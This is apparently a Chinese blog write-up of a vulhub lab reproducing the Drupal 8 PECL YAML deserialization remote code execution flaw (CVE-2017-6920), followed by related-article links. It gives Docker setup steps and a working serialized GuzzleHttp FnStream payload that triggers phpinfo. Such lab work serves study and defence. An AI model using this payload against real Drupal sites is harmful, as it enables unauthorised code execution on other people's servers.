Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920)

最新推荐文章于 2023-11-29 20:56:20 发布
最新推荐文章于 2023-11-29 20:56:20 发布
阅读量148 收藏 1
点赞数
文章标签: 网络安全 安全 web安全 系统安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56537388/article/details/134637964
版权

漏洞描述

漏洞环境及利用

搭建docker环境

环境启动后,访问 将会看到drupal的安装页面,一路默认配置下一步安装。 因为没有mysql环境,所以安装的时候可以选择sqlite数据库。

访问ip:8080

 

  • 先安装 扩展yaml(在容器中!!!)
# 换镜像源,默认带vim编辑器,所以用cat换源,可以换成自己喜欢的源 
cd /etc/apt
这里官方提供的没有切换路径,需要自己切换以下,可以cat sources.list看有没有换源成功
cat << EOF > /etc/apt/sources.list
deb http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse
EOF
这里用阿里云的源,网易的失效了
#导入阿里源的公钥,否则下一步更新源会报错
apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3B4FE6ACC0B21F32 871920D1991BC93C
 # 安装依赖 
apt update 
apt-get -y install gcc make autoconf libc-dev pkg-config
 apt-get -y install libyaml-dev 
# 安装yaml扩展 
pecl install yaml 
docker-php-ext-enable yaml.so
 # 启用 yaml.decode_php 否则无法复现成功 echo 'yaml.decode_php = 1 = 1'>>/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini 
# 退出容器 exit
 # 重启容器,CONTAINER换成自己的容器ID docker restart CONTAINER

 

 payload

!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

phpinfo成功执行,漏洞复现成功

blackK_YC
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ vulhub漏洞复现篇 ] Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920)
qq_51577576的博客
02-17 724
[ vulhub漏洞复现篇 ] Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920Drupal是使用PHP语言编写的开源内容管理框架,它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。CVE-2017- 6920Drupal CoreYAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core
Drupal 曝出代码执行高危漏洞,数百万网站受影响
weixin_33713350的博客
02-24 137
百度智能云 云生态狂欢季 热门云产品1折起>>> Drupal 开源内容管理系统曝出了一个允许黑客远...
DRUPAL 8.x远程代码执行漏洞(CVE-2018-7600)
errorr0
07-28 1679
drupal命令执行
CVE-2018-7600】Drupal 8 远程代码执行漏洞
Mr_atopos的博客
06-07 2809
使用vulhub搭建环境使用vulhub搭建环境出现了一些问题,这里直接使用BUU的环境 BUU CEV-2018-7600进去也要初始化环境,一开始语言选择英文,数据库选择SQLite 其他的可以随便设置 进入 这个漏洞可能出现在填写表单的地方,该漏洞是Form API在用户提交表单数据时可以在表单渲染过程中修改表单数据想利用该漏洞,就需要在表单结构中的某个地方注入渲染数组,所以,首先要找到注入位置可以利用注册用户来进行漏洞利用先随便输入测试 通过查阅 Drupal代码和文档,可以知道,对于
Drupal Core RESTful远程代码执行漏洞(CVE-2019-6340)
07-10
使用docker-compose命令一步搭建Drupal Core RESTful远程代码执行漏洞(CVE-2019-6340) 的漏洞环境
Drupalgeddon2:针对 Drupal v7.x + v8.x 的漏洞利用 (Drupalgeddon 2 CVE-2018-7600 SA-CORE-2018-002)
05-29
CVE-2018-7600 | Drupal 8.5.x < 8.5.1 / 8.4.x < 8.4.6 / 8.x < 8.3.9 / 7.x? < 7.58 / < 6.x? - 'Drupalgeddon2' RCE (SA-CORE-2018-002) ( ) 支持: Drupal < 8.3.9 / < 8.4.6 / < ...
站长们注意啦!开源CMS Drupal 8发布更新修复多处高危漏洞补丁,提示您升级
weixin_34268310的博客
08-21 126
据外媒报道, Drupal 研究人员于 8 月 16 日发布安全报告,宣称已修复 Drupal 8 多处漏洞并在线更新安全补丁。研究显示这些漏洞影响 Drupal 8 多个系统组件,包括实体访问系统、REST API 与部分视图组件。 CVE-2017-6925 研究人员发现 Drupal 8.3.7 中存在一处高危漏洞CVE-2017-6925),影...
Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞CVE-2017-6920
07-19 804
漏洞背景:2017年6月21日,Drupal官方发布了一个编号为CVE-2017- 6920漏洞,影响为Critical。这是Drupal CoreYAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core漏洞复现:1.打开网页先登录一个管理员账号。2.访问 http://你的ip:8080/admin/config/development/configura...
Drupal YAML 反序列化代码执行漏洞(CVE-2017-6920)
errorr0
07-28 415
yaml php反序列化
CVE-2019-6340】Drupal 8.x REST RCE 远程执行代码漏洞复现
Blog of Jaoing
04-21 2791
Drupal 是由德赖斯·布伊泰尔特创立的自由开源内容管理系统,用PHP语言写成。在业界,Drupal常被视为内容管理框架(CMF),而非一般意义上的内容管理系统(CMS)。 2019-02-20,Drupal 安全团队披露了一个安全漏洞CVE-2019-6340),如果网站开启了......
Drupal 8.x 远程执行代码漏洞复现记录
aliexiansheng的博客
08-20 1042
Drupal 8.x 远程执行代码漏洞复现记录 目录 漏洞概述 漏洞影响版本 漏洞环境搭建 漏洞评级 漏洞修复意见 1.漏洞概述 Drupal官方发布安全通告称修复了一个高危的远程代码执行漏洞CVE-2019-6340)。该漏洞源于某些字段在通过非表格(non-form resources)类型输入时未能正确过滤,导致潜在的任意PHP代码执行 2.影响版本 Drupal 8.6.x < 8.6.10 Drupal 8.5.x(或更早版本) < 8.5.11 3.环境搭建 1.使用doc
内容管理系统Drupal提出重大安全漏洞
weixin_34311757的博客
02-23 394
2019独角兽企业重金招聘Python工程师标准>>> ...
Drupal远程代码执行漏洞
最新发布
longwanlian的博客
11-29 634
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由由内容管理系统和PHP开发框架共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。2018年3月28日,Drupal Security Team官方发布公告称Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用该漏洞执行恶意代码
Drupal远程代码执行漏(CVE-2019-6340)
qq_59975439的博客
06-10 1623
Drupal远程代码执行漏(CVE-2019-6340)
"drupal < 7.32 \"drupalgeddon\" sql injection vulnerability (cve-2014-3704)漏洞"
10-28
Drupal 版本中存在一个名为“Drupalgeddon”的SQL注入漏洞漏洞编号为CVE-2014-3704。 SQL注入是一种常见的网络安全漏洞,它允许攻击者通过在输入中注入恶意的SQL代码来干扰或绕过应用程序的数据库查询。在Drupal...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值